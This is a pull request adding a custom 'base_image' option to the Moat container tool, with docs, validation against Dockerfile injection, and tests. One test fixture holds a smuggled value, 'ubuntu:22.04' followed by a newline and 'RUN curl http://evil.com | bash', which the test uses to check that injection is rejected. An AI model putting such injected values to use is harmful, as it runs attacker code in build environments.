### PR TITLE
feat: support configuring a custom base image

### DIFF
--- a/docs/content/reference/02-moat-yaml.md
+++ b/docs/content/reference/02-moat-yaml.md
@@ -25,6 +25,9 @@ dependencies:
   - postgres@17
   - redis@7
 
+# Custom base image (optional, must be Debian-based)
+# base_image: ghcr.io/myorg/my-project-deps:latest
+
 # Service overrides
 services:
   postgres:
@@ -341,6 +344,28 @@ Both docker modes require Docker runtime:
 ```bash
 # Force Docker runtime on macOS
 moat run --runtime docker ./my-project
+```
+
+### base_image
+
+Use a custom base image instead of the default image selection. Moat layers its infrastructure (non-root user, entrypoint, CA certs, etc.) on top of this image.
+
+```yaml
+base_image: ghcr.io/myorg/my-project-deps:latest
+```
+
+- Type: `string`
+- Default: Auto-selected based on `dependencies` (see table above)
+
+The base image must be **Debian-based** (Debian, Ubuntu) because Moat uses `apt-get` to install its dependencies. Alpine, Fedora, and other distributions are not supported.
+
+When `base_image` is set, it overrides the automatic image selection from `dependencies`. Runtime dependencies are still installed on top of the custom base image.
+
+```yaml
+# Pre-built image with project tooling, plus TypeScript on top
+base_image: ghcr.io/myorg/my-project-deps:latest
+dependencies:
+  - typescript
 ```
 
 ---

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -18,6 +18,10 @@ import (
 // Must start with a letter or digit.
 var volumeNameRe = regexp.MustCompile(`^[a-z0-9][a-z0-9_-]*$`)
 
+// imageRefRe matches valid Docker image references: registry/repo:tag or @sha256:digest.
+// Prevents Dockerfile injection via newlines or special characters in base_image.
+var imageRefRe = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9._\-/:]*(@sha256:[a-f0-9]{64})?$`)
+
 // Config represents a moat.yaml manifest.
 type Config struct {
 	Name         string            `yaml:"name,omitempty"`
@@ -56,6 +60,11 @@ type Config struct {
 	MCP             []MCPServerConfig      `yaml:"mcp,omitempty"`
 	Services        map[string]ServiceSpec `yaml:"services,omitempty"`
 	LanguageServers []string               `yaml:"language_servers,omitempty"`
+
+	// BaseImage specifies a custom base image for the container.
+	// Moat layers its infrastructure (user, entrypoint, etc.) on top.
+	// Must be Debian-based (Ubuntu, Debian) since moat uses apt-get.
+	BaseImage string `yaml:"base_image,omitempty"`
 
 	// Deprecated: old runtime field for language versions
 	DeprecatedRuntime *deprecatedRuntime `yaml:"-"`
@@ -516,6 +525,20 @@ func Load(dir string) (*Config, error) {
 	// Validate sandbox setting
 	if cfg.Sandbox != "" && cfg.Sandbox != "none" {
 		return nil, fmt.Errorf("invalid sandbox value %q: must be empty (default) or 'none'", cfg.Sandbox)
+	}
+
+	// Validate base_image: prevent Dockerfile injection via newlines/whitespace.
+	if cfg.BaseImage != "" {
+		cfg.BaseImage = strings.TrimSpace(cfg.BaseImage)
+		if cfg.BaseImage == "" {
+			return nil, fmt.Errorf("base_image must not be empty or whitespace-only")
+		}
+		if strings.ContainsAny(cfg.BaseImage, " \t\n\r") {
+			return nil, fmt.Errorf("base_image %q: must not contain whitespace", cfg.BaseImage)
+		}
+		if !imageRefRe.MatchString(cfg.BaseImage) {
+			return nil, fmt.Errorf("base_image %q: invalid image reference", cfg.BaseImage)
+		}
 	}
 
 	// Check for overlapping env and secrets keys

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -533,9 +533,6 @@ func Load(dir string) (*Config, error) {
 		if cfg.BaseImage == "" {
 			return nil, fmt.Errorf("base_image must not be empty or whitespace-only")
 		}
-		if strings.ContainsAny(cfg.BaseImage, " \t\n\r") {
-			return nil, fmt.Errorf("base_image %q: must not contain whitespace", cfg.BaseImage)
-		}
 		if !imageRefRe.MatchString(cfg.BaseImage) {
 			return nil, fmt.Errorf("base_image %q: invalid image reference", cfg.BaseImage)
 		}

--- a/internal/config/config_test.go
+++ b/internal/config/config_test.go
@@ -2502,8 +2502,8 @@ func TestLoadConfigBaseImageRejectsWhitespace(t *testing.T) {
 	if err == nil {
 		t.Fatal("expected error for base_image with spaces")
 	}
-	if !strings.Contains(err.Error(), "whitespace") {
-		t.Errorf("error should mention whitespace, got: %v", err)
+	if !strings.Contains(err.Error(), "base_image") {
+		t.Errorf("error should mention base_image, got: %v", err)
 	}
 }
 

--- a/internal/config/config_test.go
+++ b/internal/config/config_test.go
@@ -1,6 +1,7 @@
 package config
 
 import (
+	"fmt"
 	"os"
 	"path/filepath"
 	"strings"
@@ -2459,4 +2460,96 @@ models:
 	assert.Equal(t, 2048, spec.Memory)
 	assert.NotContains(t, spec.Extra, "memory", "memory must not appear in Extra")
 	assert.Equal(t, []string{"qwen2.5-coder:1.5b"}, spec.Extra["models"])
+}
+
+func TestLoadConfigWithBaseImage(t *testing.T) {
+	dir := t.TempDir()
+	configPath := filepath.Join(dir, "moat.yaml")
+	os.WriteFile(configPath, []byte(`
+agent: claude-code
+base_image: ghcr.io/test-org/custom-base:latest
+`), 0644)
+
+	cfg, err := Load(dir)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if cfg.BaseImage != "ghcr.io/test-org/custom-base:latest" {
+		t.Errorf("BaseImage = %q, want %q", cfg.BaseImage, "ghcr.io/test-org/custom-base:latest")
+	}
+}
+
+func TestLoadConfigBaseImageRejectsNewlineInjection(t *testing.T) {
+	dir := t.TempDir()
+	configPath := filepath.Join(dir, "moat.yaml")
+	os.WriteFile(configPath, []byte("agent: claude-code\nbase_image: \"ubuntu:22.04\\nRUN curl http://evil.com | bash\"\n"), 0644)
+
+	_, err := Load(dir)
+	if err == nil {
+		t.Fatal("expected error for base_image with newline injection")
+	}
+	if !strings.Contains(err.Error(), "base_image") {
+		t.Errorf("error should mention base_image, got: %v", err)
+	}
+}
+
+func TestLoadConfigBaseImageRejectsWhitespace(t *testing.T) {
+	dir := t.TempDir()
+	configPath := filepath.Join(dir, "moat.yaml")
+	os.WriteFile(configPath, []byte("agent: claude-code\nbase_image: \"ubuntu 22.04\"\n"), 0644)
+
+	_, err := Load(dir)
+	if err == nil {
+		t.Fatal("expected error for base_image with spaces")
+	}
+	if !strings.Contains(err.Error(), "whitespace") {
+		t.Errorf("error should mention whitespace, got: %v", err)
+	}
+}
+
+func TestLoadConfigBaseImageAcceptsValidRefs(t *testing.T) {
+	cases := []string{
+		"ubuntu:22.04",
+		"myorg/my-deps:latest",
+		"registry.example.com/org/image:v1.2.3",
+		"ghcr.io/user/repo:sha-abc123",
+		"myimage@sha256:abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789",
+	}
+	for _, ref := range cases {
+		t.Run(ref, func(t *testing.T) {
+			dir := t.TempDir()
+			configPath := filepath.Join(dir, "moat.yaml")
+			os.WriteFile(configPath, []byte(fmt.Sprintf("agent: claude-code\nbase_image: %q\n", ref)), 0644)
+
+			cfg, err := Load(dir)
+			if err != nil {
+				t.Fatalf("Load(%q): %v", ref, err)
+			}
+			if cfg.BaseImage != ref {
+				t.Errorf("BaseImage = %q, want %q", cfg.BaseImage, ref)
+			}
+		})
+	}
+}
+
+func TestLoadConfigWithBaseImageAndDeps(t *testing.T) {
+	dir := t.TempDir()
+	configPath := filepath.Join(dir, "moat.yaml")
+	os.WriteFile(configPath, []byte(`
+agent: claude-code
+base_image: ghcr.io/test-org/custom-base:latest
+dependencies:
+  - typescript
+`), 0644)
+
+	cfg, err := Load(dir)
+	if err != nil {
+		t.Fatalf("Load: %v", err)
+	}
+	if cfg.BaseImage != "ghcr.io/test-org/custom-base:latest" {
+		t.Errorf("BaseImage = %q, want %q", cfg.BaseImage, "ghcr.io/test-org/custom-base:latest")
+	}
+	if len(cfg.Dependencies) != 1 {
+		t.Fatalf("Dependencies = %d, want 1", len(cfg.Dependencies))
+	}
 }

--- a/internal/deps/builder.go
+++ b/internal/deps/builder.go
@@ -33,6 +33,9 @@ func ImageTag(deps []Dependency, opts *ImageSpec) string {
 
 	// Build the hash input
 	hashInput := strings.Join(sorted, ",")
+	if opts.BaseImage != "" {
+		hashInput += ",base:" + opts.BaseImage
+	}
 	if opts.NeedsSSH {
 		hashInput += ",ssh:agent"
 	}

--- a/internal/deps/builder_test.go
+++ b/internal/deps/builder_test.go
@@ -90,6 +90,22 @@ func TestImageTagWithFirewall(t *testing.T) {
 	}
 }
 
+func TestImageTagWithBaseImage(t *testing.T) {
+	// Base image should affect tag
+	tagDefault := ImageTag(nil, nil)
+	tagCustom := ImageTag(nil, &ImageSpec{BaseImage: "ghcr.io/test-org/custom-base:latest"})
+	if tagDefault == tagCustom {
+		t.Error("base_image should change the image hash")
+	}
+
+	// Different base images should produce different tags
+	tag1 := ImageTag(nil, &ImageSpec{BaseImage: "ghcr.io/test-org/custom-base:v1"})
+	tag2 := ImageTag(nil, &ImageSpec{BaseImage: "ghcr.io/test-org/custom-base:v2"})
+	if tag1 == tag2 {
+		t.Error("different base images should produce different tags")
+	}
+}
+
 func TestImageTagDockerModes(t *testing.T) {
 	// docker:host and docker:dind should produce different image tags
 	// because they install different packages (CLI-only vs full daemon)

--- a/internal/deps/dockerfile.go
+++ b/internal/deps/dockerfile.go
@@ -181,8 +181,15 @@ func GenerateDockerfile(deps []Dependency, opts *ImageSpec) (*DockerfileResult, 
 	// Note: Docker CLI is installed separately from Docker's official repo,
 	// not via apt, to ensure a recent version compatible with modern daemons.
 
-	// Determine base image and write header
-	baseImage, baseRuntime := selectBaseImage(c.runtimes)
+	// Determine base image and write header.
+	// A user-specified base image overrides automatic runtime selection.
+	var baseImage string
+	var baseRuntime *Dependency
+	if opts.BaseImage != "" {
+		baseImage = opts.BaseImage
+	} else {
+		baseImage, baseRuntime = selectBaseImage(c.runtimes)
+	}
 	b.WriteString("FROM " + baseImage + "\n\n")
 	b.WriteString("ENV DEBIAN_FRONTEND=noninteractive\n\n")
 

--- a/internal/deps/dockerfile_test.go
+++ b/internal/deps/dockerfile_test.go
@@ -63,6 +63,36 @@ func TestGenerateDockerfileEmpty(t *testing.T) {
 	}
 }
 
+func TestGenerateDockerfileCustomBaseImage(t *testing.T) {
+	// Custom base image should be used as FROM line
+	result, err := GenerateDockerfile(nil, &ImageSpec{BaseImage: "ghcr.io/test-org/custom-base:latest"})
+	if err != nil {
+		t.Fatalf("GenerateDockerfile error: %v", err)
+	}
+	if !strings.HasPrefix(result.Dockerfile, "FROM ghcr.io/test-org/custom-base:latest") {
+		t.Errorf("Dockerfile should use custom base image, got:\n%s", result.Dockerfile[:100])
+	}
+}
+
+func TestGenerateDockerfileCustomBaseImageWithDeps(t *testing.T) {
+	// Custom base image should override runtime-based selection
+	deps := []Dependency{
+		{Name: "node", Version: "20"},
+		{Name: "typescript"},
+	}
+	result, err := GenerateDockerfile(deps, &ImageSpec{BaseImage: "ghcr.io/test-org/custom-base:latest"})
+	if err != nil {
+		t.Fatalf("GenerateDockerfile error: %v", err)
+	}
+	if !strings.HasPrefix(result.Dockerfile, "FROM ghcr.io/test-org/custom-base:latest") {
+		t.Errorf("Dockerfile should use custom base image even with runtime deps, got:\n%s", result.Dockerfile[:100])
+	}
+	// Node runtime should still be installed since custom base image doesn't provide it
+	if strings.Contains(result.Dockerfile, "provided by base image") {
+		t.Error("custom base image should not skip runtime installation")
+	}
+}
+
 func TestGenerateDockerfileHasIptables(t *testing.T) {
 	// Verify iptables is installed when NeedsFirewall is true
 	deps := []Dependency{

--- a/internal/deps/imagespec.go
+++ b/internal/deps/imagespec.go
@@ -10,6 +10,10 @@ import (
 // and Dockerfile generation. A single ImageSpec is constructed once and passed
 // through the entire image pipeline.
 type ImageSpec struct {
+	// BaseImage overrides the default base image selection. When set, the
+	// Dockerfile uses this image as the FROM line instead of auto-selecting
+	// based on runtime dependencies. Must be Debian-based.
+	BaseImage string
 	// NeedsSSH indicates SSH grants are present and the image needs
 	// openssh-client, socat, and the moat-init entrypoint for agent forwarding.
 	NeedsSSH bool
@@ -63,7 +67,7 @@ func (s *ImageSpec) NeedsCustomImage(hasDeps bool) bool {
 		return hasDeps
 	}
 	hasHooks := s.Hooks != nil && (s.Hooks.PostBuild != "" || s.Hooks.PostBuildRoot != "" || s.Hooks.PreRun != "")
-	return hasDeps || s.NeedsSSH || len(s.InitProviders) > 0 ||
+	return hasDeps || s.BaseImage != "" || s.NeedsSSH || len(s.InitProviders) > 0 ||
 		s.NeedsFirewall || s.NeedsInitFiles || s.NeedsClipboard ||
 		len(s.ClaudePlugins) > 0 || hasHooks
 }

--- a/internal/image/resolver_test.go
+++ b/internal/image/resolver_test.go
@@ -94,6 +94,22 @@ func TestResolveWithPreRunOnly(t *testing.T) {
 	}
 }
 
+func TestResolveWithBaseImage(t *testing.T) {
+	// base_image alone (no deps) should trigger custom image build
+	img := Resolve(nil, &deps.ImageSpec{BaseImage: "ghcr.io/test-org/custom-base:latest"})
+	if img == DefaultImage {
+		t.Error("Resolve with base_image should not return default image")
+	}
+}
+
+func TestResolveWithBaseImageAffectsHash(t *testing.T) {
+	img1 := Resolve(nil, &deps.ImageSpec{BaseImage: "ghcr.io/test-org/custom-base:v1"})
+	img2 := Resolve(nil, &deps.ImageSpec{BaseImage: "ghcr.io/test-org/custom-base:v2"})
+	if img1 == img2 {
+		t.Error("different base images should produce different image tags")
+	}
+}
+
 func TestResolveWithDepsAndSSH(t *testing.T) {
 	depList := []deps.Dependency{{Name: "node", Version: "20"}}
 	imgWithoutSSH := Resolve(depList, nil)

--- a/internal/run/manager.go
+++ b/internal/run/manager.go
@@ -1340,7 +1340,12 @@ region = %s
 	// builder, which can fail to parse BuildKit syntax (e.g., --mount=type=cache
 	// confuses legacy parser line counting, causing "unknown instruction" errors).
 	useBuildKit := os.Getenv("BUILDKIT_HOST") != "" && os.Getenv("MOAT_DISABLE_BUILDKIT") != "1"
+	var baseImage string
+	if opts.Config != nil {
+		baseImage = opts.Config.BaseImage
+	}
 	imageSpec := &deps.ImageSpec{
+		BaseImage:          baseImage,
 		NeedsSSH:           hasSSHGrants,
 		SSHHosts:           sshGrants,
 		InitProviders:      imgNeeds.initProviders,


### PR DESCRIPTION
This implements the [suggestion for configuring a custom base image via a new `base_image` (#258)](https://github.com/majorcontext/moat/issues/258#issuecomment-4079436459) configuration option.

I've validated locally that this works as intended.